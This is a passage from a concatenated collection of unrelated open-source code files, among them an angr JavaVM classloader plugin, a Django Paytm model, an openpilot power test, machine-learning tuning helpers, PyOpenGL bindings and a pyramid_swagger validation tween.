self.state.memory.heap = simgr.deadended[-1].memory.heap.copy()
else:
l.debug("Class initializer <clinit> is not loaded in CLE. Skip initializiation.")
@property
def initialized_classes(self):
"""
List of all initialized classes.
"""
return self._initialized_classes
@SimStatePlugin.memo
def copy(self, memo): # pylint: disable=unused-argument
return SimJavaVmClassloader(
initialized_classes=self.initialized_classes.copy()
)
def merge(self, others, merge_conditions, common_ancestor=None): # pylint: disable=unused-argument
l.warning("Merging is not implemented for JavaVM classloader!")
return False
def widen(self, others): # pylint: disable=unused-argument
l.warning("Widening is not implemented for JavaVM classloader!")
return False
# TODO use a default JavaVM preset
# see for reference: angr/engines/__init__.py
SimState.register_default('javavm_classloader', SimJavaVmClassloader)
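# Rough usage sketch (illustrative only, not part of this module): assuming
# `project` is an angr Project created from a Java/Soot target, its states
# expose the plugin registered above, e.g.
#
#   state = project.factory.entry_state()
#   cls = state.javavm_classloader.get_class("java.lang.String", init_class=True)
#   hierarchy = state.javavm_classloader.get_class_hierarchy(cls)
#   state.javavm_classloader.is_class_initialized(cls)   # True after init_class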
|
from django.db import models
from django.conf import settings
from django.utils import timezone
# Create your models here.
class PaytmHistory(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, related_name='rel_payment_paytm', on_delete=models.CASCADE)
ORDERID = models.CharField('ORDER ID', max_length=30)
TXNDATE = models.DateTimeField('TXN DATE', default=timezone.now)
TXNID = models.IntegerField('TXN ID')
BANKTXNID = models.IntegerField('BANK TXN ID', null=True, blank=True)
BANKNAME = models.CharField('BANK NAME', max_length=50, null=True, blank=True)
RESPCODE = models.IntegerField('RESP CODE')
PAYMENTMODE = models.CharField('PAYMENT MODE', max_length=10, null=True, blank=True)
CURRENCY = models.CharField('CURRENCY', max_length=4, null=True, blank=True)
GATEWAYNAME = models.CharField("GATEWAY NAME", max_length=30, null=True, blank=True)
MID = models.CharField(max_length=40)
RESPMSG = models.TextField('RESP MSG', max_length=250)
TXNAMOUNT = models.FloatField('TXN AMOUNT')
STATUS = models.CharField('STATUS', max_length=12)
class Meta:
app_label = 'paytm'
def __unicode__(self):
return self.STATUS
|
#!/usr/bin/env python3
import unittest
import time
import math
from dataclasses import dataclass
from selfdrive.hardware import HARDWARE, TICI
from selfdrive.hardware.tici.power_monitor import get_power
from selfdrive.manager.process_config import managed_processes
from selfdrive.manager.manager import manager_cleanup
@dataclass
class Proc:
name: str
power: float
rtol: float = 0.05
atol: float = 0.1
warmup: float = 6.
PROCS = [
Proc('camerad', 2.15),
Proc('modeld', 1.0),
Proc('dmonitoringmodeld', 0.25),
Proc('encoderd', 0.23),
]
class TestPowerDraw(unittest.TestCase):
@classmethod
def setUpClass(cls):
if not TICI:
raise unittest.SkipTest
def setUp(self):
HARDWARE.initialize_hardware()
HARDWARE.set_power_save(False)
def tearDown(self):
manager_cleanup()
def test_camera_procs(self):
baseline = get_power()
prev = baseline
used = {}
for proc in PROCS:
managed_processes[proc.name].start()
time.sleep(proc.warmup)
now = get_power(8)
used[proc.name] = now - prev
prev = now
manager_cleanup()
print("-"*35)
print(f"Baseline {baseline:.2f}W\n")
for proc in PROCS:
cur = used[proc.name]
expected = proc.power
print(f"{proc.name.ljust(20)} {expected:.2f}W {cur:.2f}W")
with self.subTest(proc=proc.name):
self.assertTrue(math.isclose(cur, expected, rel_tol=proc.rtol, abs_tol=proc.atol))
print("-"*35)
if __name__ == "__main__":
unittest.main()
|
# Maps environment variables to variables accessible within Bazel Build files
def _impl(repository_ctx):
env_vars = repository_ctx.attr.env_vars
bzl_vars = ""
for env_var in env_vars:
bzl_var = repository_ctx.execute(["printenv", env_var]).stdout.rstrip()
bzl_vars = bzl_vars + "\n{} = \"{}\"".format(env_var, bzl_var)
repository_ctx.file("env_vars.bzl", bzl_vars)
repository_ctx.file("BUILD.bazel", """
exports_files(["env_vars.bzl"])
""")
load_env_vars = repository_rule(
implementation = _impl,
attrs = {
"env_vars": attr.string_list(mandatory = True)
}
)
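# Illustrative use of the rule above (hypothetical workspace layout, not
# generated by this file): assuming this .bzl file is reachable as
# //:env_vars_repo.bzl, a WORKSPACE could instantiate it and BUILD files could
# then load the captured values:
#
#   load("//:env_vars_repo.bzl", "load_env_vars")
#   load_env_vars(
#       name = "local_env",
#       env_vars = ["HOME", "CC"],
#   )
#
#   # in a BUILD.bazel file:
#   load("@local_env//:env_vars.bzl", "HOME", "CC")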
|
from framework.latentmodule import LatentModule
import random
import time
class Main(LatentModule):
def __init__(self):
LatentModule.__init__(self)
# set defaults for some configurable parameters:
self.trials = 5
def run(self):
self.write('We are now testing your reaction times.\nPress the space bar when you are ready.','space')
self.write('First we will test your keyboard.\nWhen the red rectangle disappears, press the Enter key.',3)
self.rectangle((-0.5,0.5,-0.2,0.2),duration=3.5,color=(1,0,0,1))
if self.waitfor('enter',duration=30):
self.write('Good.',2)
else:
            self.write("It doesn't look like you're pressing the enter key. Ending the experiment.",3)
return
self.write('Now, whenever the crosshair comes up, press the enter key as fast as possible.\nYou have 3 seconds for each trial. There will be %i trials.\nSpace when ready.' % self.trials,'space')
# countdown
for k in [3,2,1]:
self.write(str(k),1,scale=0.2)
all_reaction_times = []
for k in range(self.trials):
# wait for a random interval between 2 and 5 seconds
self.sleep(random.uniform(2,5))
# show the crosshair and keep it
self.crosshair(duration=3,block=False)
rt = self.watchfor('enter',3)
if not rt:
                self.write("Timeout! You didn't make it.",2,fg=(1,0,0,1))
elif len(rt) > 1:
self.write('Oops, you pressed more than one time.',2,fg=(1,0,0,1))
else:
self.write('Your reaction time was %g seconds.' % rt[0], duration=2, fg = ((0,1,0,1) if rt[0]<0.5 else (1,1,0,1)))
all_reaction_times.append(rt[0])
self.write('Your average reaction time was %g seconds.\nHit the space bar to end the experiment.' % (sum(all_reaction_times)/len(all_reaction_times)),'space')
|
"""
-*- test-case-name: PyHouse.src.Modules.families.UPB.test.test_Device_UPB -*-
@name: PyHouse/src/Modules/families/UPB/UPB_xml.py
@author: D. Brian Kimmel
@contact: [email protected]
@copyright: (c) 2014-2015 by D. Brian Kimmel
@license: MIT License
@note: Created on Aug 6, 2014
@summary: This module is for communicating with UPB controllers.
"""
# Import system type stuff
# Import PyMh files
from Modules.Families.UPB.UPB_data import UPBData
from Modules.Utilities.xml_tools import PutGetXML, stuff_new_attrs
from Modules.Computer import logging_pyh as Logger
g_debug = 9
LOG = Logger.getLogger('PyHouse.UPB_xml ')
class Xml(object):
@staticmethod
def ReadXml(p_device_obj, p_in_xml):
"""
@param p_in_xml: is the e-tree XML house object
@param p_house: is the text name of the House.
@return: a dict of the entry to be attached to a house object.
"""
l_obj = UPBData()
l_obj.UPBAddress = PutGetXML.get_int_from_xml(p_in_xml, 'UPBAddress', 255)
l_obj.UPBNetworkID = PutGetXML.get_int_from_xml(p_in_xml, 'UPBNetworkID')
l_obj.UPBPassword = PutGetXML.get_int_from_xml(p_in_xml, 'UPBPassword')
stuff_new_attrs(p_device_obj, l_obj)
return l_obj # for testing
@staticmethod
def WriteXml(p_out_xml, p_device_obj):
try:
PutGetXML.put_int_element(p_out_xml, 'UPBAddress', p_device_obj.UPBAddress)
PutGetXML.put_int_element(p_out_xml, 'UPBNetworkID', p_device_obj.UPBNetworkID)
PutGetXML.put_int_element(p_out_xml, 'UPBPassword', p_device_obj.UPBPassword)
except AttributeError as e_err:
LOG.error('InsertDeviceXML ERROR {}'.format(e_err))
# ## END DBK
|
import logging
import optuna
import optuna.integration.lightgbm as lgb
import pandas as pd
from catboost import CatBoostClassifier
from lightgbm import LGBMClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import (RepeatedStratifiedKFold, StratifiedKFold,
cross_val_score)
from sklearn.tree import DecisionTreeClassifier
from xgboost import XGBClassifier, XGBRegressor, plot_importance
from instrumentum.model_tuning._optuna_dispatchers import optuna_param_disp
logger = logging.getLogger(__name__)
def _opt_generic_objective(X, y, trial, estimator, cv, metric):
param = optuna_param_disp[estimator.__name__](trial)
estimator = estimator(**param)
score = cross_val_score(estimator, X=X, y=y, cv=cv, scoring=metric).mean()
trial_n = len(trial.study.trials)
best_score = (
score
if trial_n == 1 or score > trial.study.best_value
else trial.study.best_value
)
logger.info("Trials: %s, Best Score: %s, Score %s", trial_n, best_score, score)
return score
def wrapper_opt(
X,
y,
estimator=None,
metric="roc_auc",
n_trials=5,
verbose=logging.INFO,
return_fit=True,
direction="maximize",
cv_splits=5,
cv_repeats=1,
):
# Our Logger
logger.setLevel(verbose)
# Let's turn off the verbosity of optuna
optuna.logging.set_verbosity(optuna.logging.ERROR)
cv = RepeatedStratifiedKFold(n_splits=cv_splits, n_repeats=cv_repeats)
estimator = estimator or DecisionTreeClassifier
logger.info("Estimator received: %s, trials: %s\n", estimator.__name__, n_trials)
study = optuna.create_study(direction=direction)
study.optimize(
lambda trial: _opt_generic_objective(
trial=trial,
X=X,
y=y,
estimator=estimator,
cv=cv,
metric=metric,
),
n_trials=n_trials,
)
estimator = estimator(**study.best_params)
return_fit and estimator.fit(X, y)
return study.best_trial.value, estimator
def wrapper_opt_lgbm(
X, y, metric="auc", time_budget=120, verbose=logging.INFO, return_fit=False
):
# Our Logger
logger.setLevel(verbose)
# Let's turn off the verbosity of optuna and lighgbm
optuna.logging.set_verbosity(optuna.logging.ERROR)
no_logger = logging.getLogger("sd")
no_logger.addHandler(logging.NullHandler())
lgb.register_logger(no_logger)
def log_trials(std, frz_trial):
logger.info(
"\nTrials: %s, Iteration Score: %s", len(std.trials), std.best_value
)
params = {
"objective": "binary",
"metric": metric,
"boosting_type": "gbdt",
"seed": 42,
}
dtrain = lgb.Dataset(X, label=y)
rkf = RepeatedStratifiedKFold(
n_splits=10,
n_repeats=2,
random_state=42,
)
study_tuner = optuna.create_study(direction="maximize")
tuner = lgb.LightGBMTunerCV(
params,
dtrain,
study=study_tuner,
time_budget=time_budget,
seed=42,
optuna_callbacks=[log_trials],
show_progress_bar=False,
folds=rkf,
)
tuner.run()
lgbm = LGBMClassifier(**tuner.best_params)
return_fit and lgbm.fit(X, y)
return tuner.best_score, lgbm
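# Illustrative call of the wrappers above (a sketch, not part of the library;
# the dataset is synthetic and only stands in for a real binary-classification problem):
#
#   from sklearn.datasets import make_classification
#   X, y = make_classification(n_samples=500, n_features=20, random_state=42)
#   best_score, fitted_tree = wrapper_opt(X, y, n_trials=10)   # DecisionTreeClassifier by default
#   best_auc, lgbm = wrapper_opt_lgbm(X, y, time_budget=60, return_fit=True)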
|
import numpy as np
from rosenbrock_helper import f
from rosenbrock_helper import f_prime_x0
from rosenbrock_helper import f_prime_x1
from rosenbrock_helper import plot_rosenbrock
np.random.seed(0)
def main():
x0=np.random.uniform(-2.0,2.0)
x1=np.random.uniform(-2.0,2.0)
x_start = (x0,x1)
y_start = f(x0,x1)
print (f"Global minimum: {(1,1)}")
print(f"X_start: {(x0,x1)}")
print(f"Y_start: {y_start}")
plot_rosenbrock(x_start)
learning_rate = 0.005
num_iterations = 1000
gradient_steps = []
for it in range(num_iterations):
        # evaluate both partial derivatives at the current point before stepping,
        # so x1 is not updated with an already-moved x0
        grad_x0 = f_prime_x0(x0,x1)
        grad_x1 = f_prime_x1(x0,x1)
        x0 = x0 - grad_x0 * learning_rate
        x1 = x1 - grad_x1 * learning_rate
        y = f(x0,x1)
        if it % 10 == 0:
            print(f" x0, x1 = {(x0,x1)}, y = {y}")
gradient_steps.append((x0,x1))
x_end = (x0,x1)
y_end = f(x0,x1)
print(f"x0 end, x1 end = {(x_end)}, y end = {(y_end)}")
plot_rosenbrock(x_start, gradient_steps)
if __name__ == "__main__":
main() |
'''Autogenerated by get_gl_extensions script, do not edit!'''
from OpenGL import platform as _p, constants as _cs, arrays
from OpenGL.GL import glget
import ctypes
EXTENSION_NAME = 'GL_VERSION_GL_1_5'
def _f( function ):
return _p.createFunction( function,_p.GL,'GL_VERSION_GL_1_5',False)
_p.unpack_constants( """GL_BUFFER_SIZE 0x8764
GL_BUFFER_USAGE 0x8765
GL_QUERY_COUNTER_BITS 0x8864
GL_CURRENT_QUERY 0x8865
GL_QUERY_RESULT 0x8866
GL_QUERY_RESULT_AVAILABLE 0x8867
GL_ARRAY_BUFFER 0x8892
GL_ELEMENT_ARRAY_BUFFER 0x8893
GL_ARRAY_BUFFER_BINDING 0x8894
GL_ELEMENT_ARRAY_BUFFER_BINDING 0x8895
GL_VERTEX_ATTRIB_ARRAY_BUFFER_BINDING 0x889F
GL_READ_ONLY 0x88B8
GL_WRITE_ONLY 0x88B9
GL_READ_WRITE 0x88BA
GL_BUFFER_ACCESS 0x88BB
GL_BUFFER_MAPPED 0x88BC
GL_BUFFER_MAP_POINTER 0x88BD
GL_STREAM_DRAW 0x88E0
GL_STREAM_READ 0x88E1
GL_STREAM_COPY 0x88E2
GL_STATIC_DRAW 0x88E4
GL_STATIC_READ 0x88E5
GL_STATIC_COPY 0x88E6
GL_DYNAMIC_DRAW 0x88E8
GL_DYNAMIC_READ 0x88E9
GL_DYNAMIC_COPY 0x88EA
GL_SAMPLES_PASSED 0x8914
GL_SRC1_ALPHA 0x8589
GL_VERTEX_ARRAY_BUFFER_BINDING 0x8896
GL_NORMAL_ARRAY_BUFFER_BINDING 0x8897
GL_COLOR_ARRAY_BUFFER_BINDING 0x8898
GL_INDEX_ARRAY_BUFFER_BINDING 0x8899
GL_TEXTURE_COORD_ARRAY_BUFFER_BINDING 0x889A
GL_EDGE_FLAG_ARRAY_BUFFER_BINDING 0x889B
GL_SECONDARY_COLOR_ARRAY_BUFFER_BINDING 0x889C
GL_FOG_COORDINATE_ARRAY_BUFFER_BINDING 0x889D
GL_WEIGHT_ARRAY_BUFFER_BINDING 0x889E
GL_FOG_COORD_SRC 0x8450
GL_FOG_COORD 0x8451
GL_CURRENT_FOG_COORD 0x8453
GL_FOG_COORD_ARRAY_TYPE 0x8454
GL_FOG_COORD_ARRAY_STRIDE 0x8455
GL_FOG_COORD_ARRAY_POINTER 0x8456
GL_FOG_COORD_ARRAY 0x8457
GL_FOG_COORD_ARRAY_BUFFER_BINDING 0x889D
GL_SRC0_RGB 0x8580
GL_SRC1_RGB 0x8581
GL_SRC2_RGB 0x8582
GL_SRC0_ALPHA 0x8588
GL_SRC2_ALPHA 0x858A""", globals())
glget.addGLGetConstant( GL_QUERY_COUNTER_BITS, (1,) )
glget.addGLGetConstant( GL_ARRAY_BUFFER_BINDING, (1,) )
glget.addGLGetConstant( GL_ELEMENT_ARRAY_BUFFER_BINDING, (1,) )
glget.addGLGetConstant( GL_VERTEX_ARRAY_BUFFER_BINDING, (1,) )
glget.addGLGetConstant( GL_NORMAL_ARRAY_BUFFER_BINDING, (1,) )
glget.addGLGetConstant( GL_COLOR_ARRAY_BUFFER_BINDING, (1,) )
glget.addGLGetConstant( GL_INDEX_ARRAY_BUFFER_BINDING, (1,) )
glget.addGLGetConstant( GL_TEXTURE_COORD_ARRAY_BUFFER_BINDING, (1,) )
glget.addGLGetConstant( GL_EDGE_FLAG_ARRAY_BUFFER_BINDING, (1,) )
glget.addGLGetConstant( GL_SECONDARY_COLOR_ARRAY_BUFFER_BINDING, (1,) )
glget.addGLGetConstant( GL_FOG_COORD_SRC, (1,) )
glget.addGLGetConstant( GL_FOG_COORD_ARRAY_TYPE, (1,) )
glget.addGLGetConstant( GL_FOG_COORD_ARRAY_STRIDE, (1,) )
glget.addGLGetConstant( GL_FOG_COORD_ARRAY, (1,) )
glget.addGLGetConstant( GL_FOG_COORD_ARRAY_BUFFER_BINDING, (1,) )
@_f
@_p.types(None,_cs.GLsizei,arrays.GLuintArray)
def glGenQueries( n,ids ):pass
@_f
@_p.types(None,_cs.GLsizei,arrays.GLuintArray)
def glDeleteQueries( n,ids ):pass
@_f
@_p.types(_cs.GLboolean,_cs.GLuint)
def glIsQuery( id ):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLuint)
def glBeginQuery( target,id ):pass
@_f
@_p.types(None,_cs.GLenum)
def glEndQuery( target ):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLenum,arrays.GLintArray)
def glGetQueryiv( target,pname,params ):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLenum,arrays.GLintArray)
def glGetQueryObjectiv( id,pname,params ):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLenum,arrays.GLuintArray)
def glGetQueryObjectuiv( id,pname,params ):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLuint)
def glBindBuffer( target,buffer ):pass
@_f
@_p.types(None,_cs.GLsizei,arrays.GLuintArray)
def glDeleteBuffers( n,buffers ):pass
@_f
@_p.types(None,_cs.GLsizei,arrays.GLuintArray)
def glGenBuffers( n,buffers ):pass
@_f
@_p.types(_cs.GLboolean,_cs.GLuint)
def glIsBuffer( buffer ):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLsizeiptr,ctypes.c_void_p,_cs.GLenum)
def glBufferData( target,size,data,usage ):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLintptr,_cs.GLsizeiptr,ctypes.c_void_p)
def glBufferSubData( target,offset,size,data ):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLintptr,_cs.GLsizeiptr,ctypes.c_void_p)
def glGetBufferSubData( target,offset,size,data ):pass
@_f
@_p.types(ctypes.c_void_p,_cs.GLenum,_cs.GLenum)
def glMapBuffer( target,access ):pass
@_f
@_p.types(_cs.GLboolean,_cs.GLenum)
def glUnmapBuffer( target ):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLenum,arrays.GLintArray)
def glGetBufferParameteriv( target,pname,params ):pass
@_f
@_p.types(None,_cs.GLenum,_cs.GLenum,arrays.GLvoidpArray)
def glGetBufferPointerv( target,pname,params ):pass
|
r"""
Gradient Accumulator
====================
Change gradient accumulation factor according to scheduling.
Trainer also calls ``optimizer.step()`` for the last indivisible step number.
"""
from pytorch_lightning.callbacks.base import Callback
class GradientAccumulationScheduler(Callback):
r"""
Change gradient accumulation factor according to scheduling.
Args:
scheduling: scheduling in format {epoch: accumulation_factor}
Example::
>>> from pytorch_lightning import Trainer
>>> from pytorch_lightning.callbacks import GradientAccumulationScheduler
# at epoch 5 start accumulating every 2 batches
>>> accumulator = GradientAccumulationScheduler(scheduling={5: 2})
>>> trainer = Trainer(callbacks=[accumulator])
# alternatively, pass the scheduling dict directly to the Trainer
>>> trainer = Trainer(accumulate_grad_batches={5: 2})
"""
def __init__(self, scheduling: dict):
super().__init__()
if not scheduling: # empty dict error
raise TypeError("Empty dict cannot be interpreted correct")
for key in scheduling:
if not isinstance(key, int) or not isinstance(scheduling[key], int):
raise TypeError("All epoches and accumulation factor must be integers")
minimal_epoch = min(scheduling.keys())
if minimal_epoch < 0:
raise IndexError(f"Epochs indexing from 1, epoch {minimal_epoch} cannot be interpreted correct")
if minimal_epoch != 0: # if user didnt define first epoch accumulation factor
scheduling.update({0: 1})
self.scheduling = scheduling
self.epochs = sorted(scheduling.keys())
def on_epoch_start(self, trainer, pl_module):
epoch = trainer.current_epoch
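        # Scan the scheduled epochs from latest to earliest and apply the
        # accumulation factor of the most recent milestone already reached.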
for i in reversed(range(len(self.epochs))):
if epoch >= self.epochs[i]:
trainer.accumulate_grad_batches = self.scheduling.get(self.epochs[i])
break
|
# Generic implementation of Decision Trees.
from math import log, inf, sqrt
from B_GenericDecisionTree import DecisionTree
from random import randint
class RandomForest:
def __init__(self, X, Y, atr_types, atr_names, num_trees):
self.X = X
self.Y = Y
self.atr_types = atr_types
self.atr_names = atr_names
        # Number of trees to use.
self.num_trees = num_trees
        # Trees
self.trees = []
def train(self, splits=-1):
""" Entrenamos los distintos arboles. """
for i in range(self.num_trees):
# Escogemos los datos de entrenamiento de forma aleatoria
N = len(self.X)
X_i, Y_i = [], []
for _ in range(N):
k = randint(0, N-1)
X_i.append(self.X[k])
Y_i.append(self.Y[k])
            # Randomly choose which attributes to disable (sample M indices out of all N)
            N = len(self.atr_types)
            M = int(sqrt(N))
            atr = [j for j in range(N)]
            atr_avail = [1]*N
            for _ in range(M):
                k = randint(0, len(atr)-1)
                atr_avail[atr.pop(k)] = 0
            # Randomly choose one of the split criteria
            criterios = ["Gini", "Entropy"]
            c = criterios[randint(0,1)]
            # Create a new tree
t = DecisionTree(X_i.copy(), Y_i.copy(), self.atr_types, self.atr_names, atr_avail.copy())
t.train(splits, c)
self.trees.append(t)
print(str(i) + "-esimo Arbol de Decision entrenado!")
def predict(self, x, trees = None):
""" Ponemos a los arboles a votar y la etiqueta con mas votos sera retornada. """
if trees == None: trees = self.trees
dic = {}
for t in trees:
r = t.predict(x)
if not r in dic: dic[r] = 1
else: dic[r] += 1
max_v = 0
v = None
for d in dic:
if dic[d] > max_v:
max_v = dic[d]
v = d
return v
def OOB(self):
""" Verificamos la calidad del random forest usando el metodo Out Of Bag. """
acc, N = 0, 0
for i, x in enumerate(self.X):
trees = []
for t in self.trees:
if not x in t.X: trees.append(t)
if len(trees) > 0:
N += 1
if self.predict(x, trees) == self.Y[i][0]: acc += 1
if N == 0: return -1
return acc/N
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from collections import namedtuple
from contextlib import contextmanager
import functools
import logging
import re
from pyramid.interfaces import IRoutesMapper
import jsonschema.exceptions
import simplejson
from pyramid_swagger.exceptions import RequestValidationError
from pyramid_swagger.exceptions import ResponseValidationError
from pyramid_swagger.model import PathNotMatchedError
log = logging.getLogger(__name__)
DEFAULT_EXCLUDED_PATHS = [
r'^/static/?',
r'^/api-docs/?'
]
class Settings(namedtuple(
'Settings',
[
'schema',
'validate_request',
'validate_response',
'validate_path',
'exclude_paths',
'exclude_routes',
]
)):
"""A settings object for configuratble options.
:param schema: a :class:`pyramid_swagger.model.SwaggerSchema`
:param validate_swagger_spec: check Swagger files for correctness.
:param validate_request: check requests against Swagger spec.
:param validate_response: check responses against Swagger spec.
:param validate_path: check if request path is in schema. If disabled
and path not found in schema, request / response validation is skipped.
:param exclude_paths: list of paths (in regex format) that should be
excluded from validation.
:rtype: namedtuple
:param exclude_routes: list of route names that should be excluded from
validation.
"""
@contextmanager
def noop_context(request, response=None):
yield
def _get_validation_context(registry):
validation_context_path = registry.settings.get(
'pyramid_swagger.validation_context_path',
)
if validation_context_path:
        m = re.match(
            r'(?P<module_path>.*)\.(?P<contextmanager_name>.*)',
            validation_context_path,
        )
module_path = m.group('module_path')
contextmanager_name = m.group('contextmanager_name')
return getattr(
__import__(module_path, fromlist=contextmanager_name),
contextmanager_name,
)
else:
return noop_context
def validation_tween_factory(handler, registry):
"""Pyramid tween for performing validation.
Note this is very simple -- it validates requests, responses, and paths
while delegating to the relevant matching view.
"""
settings = load_settings(registry)
route_mapper = registry.queryUtility(IRoutesMapper)
def validator_tween(request):
# We don't have access to this yet but let's go ahead and build the
# matchdict so we can validate it and use it to exclude routes from
# validation.
route_info = route_mapper(request)
if should_exclude_request(settings, request, route_info):
return handler(request)
validation_context = _get_validation_context(registry)
try:
validator_map = settings.schema.validators_for_request(request)
except PathNotMatchedError as exc:
if settings.validate_path:
with validation_context(request):
raise RequestValidationError(str(exc))
else:
return handler(request)
if settings.validate_request:
request_data = handle_request(
PyramidSwaggerRequest(request, route_info),
validation_context,
validator_map)
def swagger_data(_):
return request_data
request.set_property(swagger_data)
response = handler(request)
if settings.validate_response:
with validation_context(request, response=response):
validate_response(response, validator_map.response)
return response
return validator_tween
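# A minimal registration sketch (assuming this module is importable as
# ``pyramid_swagger.tween``); in practice ``config.include('pyramid_swagger')``
# is the usual way to wire the tween into a Pyramid app:
#
#     config.add_tween('pyramid_swagger.tween.validation_tween_factory')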
class PyramidSwaggerRequest(object):
"""Adapter for a :class:`pyramid.request.Request` which exposes request
data for casting and validation.
"""
FORM_TYPES = [
'application/x-www-form-urlencoded',
'multipart/form-data',
]
def __init__(self, request, route_info):
self.request = request
self.route_info = route_info
@property
def query(self):
return self.request.GET
@property
def path(self):
return self.route_info.get('match') or {}
@property
def headers(self):
return self.request.headers
@property
def form(self):
# Don't read the POST dict unless the body is form encoded
if self.request.headers.get('Content-Type') in self.FORM_TYPES:
return self.request.POST
return {}
@property
def body(self):
return getattr(self.request, 'json_body', {})
def handle_request(request, validation_context, validator_map):
"""Validate the request against the swagger spec and return a dict with
all parameter values available in the request, casted to the expected
python type.
:param request: a :class:`PyramidSwaggerRequest` to validate
:param validation_context: a context manager for wrapping validation
errors
:param validator_map: a :class:`pyramid_swagger.load_schema.ValidatorMap`
used to validate the request
:returns: a :class:`dict` of request data for each parameter in the swagger
spec
"""
request_data = {}
validation_pairs = []
for validator, values in [
(validator_map.query, request.query),
(validator_map.path, request.path),
(validator_map.form, request.form),
(validator_map.headers, request.headers),
]:
values = cast_params(validator.schema, values)
validation_pairs.append((validator, values))
request_data.update(values)
# Body is a special case because the key for the request_data comes
# from the name in the schema, instead of keys in the values
if validator_map.body.schema:
param_name = validator_map.body.schema['name']
validation_pairs.append((validator_map.body, request.body))
request_data[param_name] = request.body
with validation_context(request):
validate_request(validation_pairs)
return request_data
def load_settings(registry):
return Settings(
schema=registry.settings['pyramid_swagger.schema'],
validate_request=registry.settings.get(
'pyramid_swagger.enable_request_validation',
True
),
validate_response=registry.settings.get(
'pyramid_swagger.enable_response_validation',
True
),
validate_path=registry.settings.get(
'pyramid_swagger.enable_path_validation',
True
),
exclude_paths=get_exclude_paths(registry),
exclude_routes=set(registry.settings.get(
'pyramid_swagger.exclude_routes',
) or []),
)
def get_exclude_paths(registry):
"""Compiles a list of paths that should not be validated against.
:rtype: list of compiled validation regexes
"""
# TODO(#63): remove deprecated `skip_validation` setting in v2.0.
regexes = registry.settings.get(
'pyramid_swagger.skip_validation',
registry.settings.get(
'pyramid_swagger.exclude_paths',
DEFAULT_EXCLUDED_PATHS
)
)
# being nice to users using strings :p
if not isinstance(regexes, list) and not isinstance(regexes, tuple):
regexes = [regexes]
return [re.compile(r) for r in regexes]
def should_exclude_request(settings, request, route_info):
disable_all_validation = not any((
settings.validate_request,
settings.validate_response,
settings.validate_path
))
return (
disable_all_validation or
should_exclude_path(settings.exclude_paths, request.path) or
should_exclude_route(settings.exclude_routes, route_info)
)
def should_exclude_path(exclude_path_regexes, path):
# Skip validation for the specified endpoints
return any(r.match(path) for r in exclude_path_regexes)
def should_exclude_route(excluded_routes, route_info):
return (
route_info.get('route') and
route_info['route'].name in excluded_routes
)
def validation_error(exc_class):
def decorator(f):
@functools.wraps(f)
def _validate(*args, **kwargs):
try:
return f(*args, **kwargs)
except jsonschema.exceptions.ValidationError as exc:
# This will alter our stack trace slightly, but Pyramid knows
# how to render it. And the real value is in the message
# anyway.
raise exc_class(str(exc))
return _validate
return decorator
CAST_TYPE_TO_FUNC = {
'integer': int,
'float': float,
'boolean': bool,
}
def cast_request_param(param_type, param_name, param_value):
"""Try to cast a request param (e.g. query arg, POST data) from a string to
its specified type in the schema. This allows validating non-string params.
    :param param_type: name of the type to cast to
:type param_type: string
:param param_name: param name
:type param_name: string
:param param_value: param value
:type param_value: string
"""
try:
return CAST_TYPE_TO_FUNC.get(param_type, lambda x: x)(param_value)
except ValueError:
log.warn("Failed to cast %s value of %s to %s",
param_name, param_value, param_type)
# Ignore type error, let jsonschema validation handle incorrect types
return param_value
@validation_error(RequestValidationError)
def validate_request(validation_pairs):
for validator, values in validation_pairs:
validator.validate(values)
def cast_params(schema, values):
if not schema:
return {}
def get_type(param_name):
return schema['properties'].get(param_name, {}).get('type')
return dict(
(k, cast_request_param(get_type(k), k, v))
for k, v in values.items()
)
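# For example, given a schema {'properties': {'limit': {'type': 'integer'}}},
# cast_params(schema, {'limit': '10'}) returns {'limit': 10}; unknown or
# uncastable values are passed through unchanged for jsonschema to reject.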
@validation_error(ResponseValidationError)
def validate_response(response, validator):
"""Validates response against our schemas.
:param response: the response object to validate
:type response: :class:`pyramid.response.Response`
:param validator: validator for the response
    :type validator: :class:`pyramid_swagger.load_schema.SchemaValidator`
"""
# Short circuit if we are supposed to not validate anything.
if (
validator.schema.get('type') == 'void' and
response.body in (None, b'', b'{}', b'null')
):
return
validator.validate(prepare_body(response))
def prepare_body(response):
# content_type and charset must both be set to access response.text
if response.content_type is None or response.charset is None:
raise ResponseValidationError(
'Response validation error: Content-Type and charset must be set'
)
if 'application/json' in response.content_type:
return simplejson.loads(response.text)
else:
return response.text
|
# encoding: utf-8
from __future__ import unicode_literals
import pytest
from emails.backend.factory import ObjectFactory
def test_object_factory():
class A:
""" Sample class for testing """
def __init__(self, a, b=None):
self.a = a
self.b = b
factory = ObjectFactory(cls=A)
obj1 = factory[{'a': 1, 'b': 2}]
assert isinstance(obj1, A)
assert obj1.a == 1
assert obj1.b == 2
obj2 = factory[{'a': 1, 'b': 2}]
assert obj2 is obj1
obj3 = factory[{'a': 100}]
assert obj3 is not obj1
obj4 = factory.invalidate({'a': 100})
assert obj3 != obj4
assert obj3.a == obj4.a
with pytest.raises(ValueError):
factory[42]
|
import smart_imports
smart_imports.all()
class Client(client.Client):
__slots__ = ()
def message_to_protobuf(self, message):
raise NotImplementedError
def protobuf_to_message(self, pb_message):
raise NotImplementedError
def cmd_push_message(self, account_id, message, size):
operations.async_request(url=self.url('push-message'),
data=tt_protocol_diary_pb2.PushMessageRequest(account_id=account_id,
message=self.message_to_protobuf(message),
diary_size=size))
def cmd_version(self, account_id):
answer = operations.sync_request(url=self.url('version'),
data=tt_protocol_diary_pb2.VersionRequest(account_id=account_id),
AnswerType=tt_protocol_diary_pb2.VersionResponse)
return answer.version
def cmd_diary(self, account_id):
answer = operations.sync_request(url=self.url('diary'),
data=tt_protocol_diary_pb2.DiaryRequest(account_id=account_id),
AnswerType=tt_protocol_diary_pb2.DiaryResponse)
return {'version': answer.diary.version,
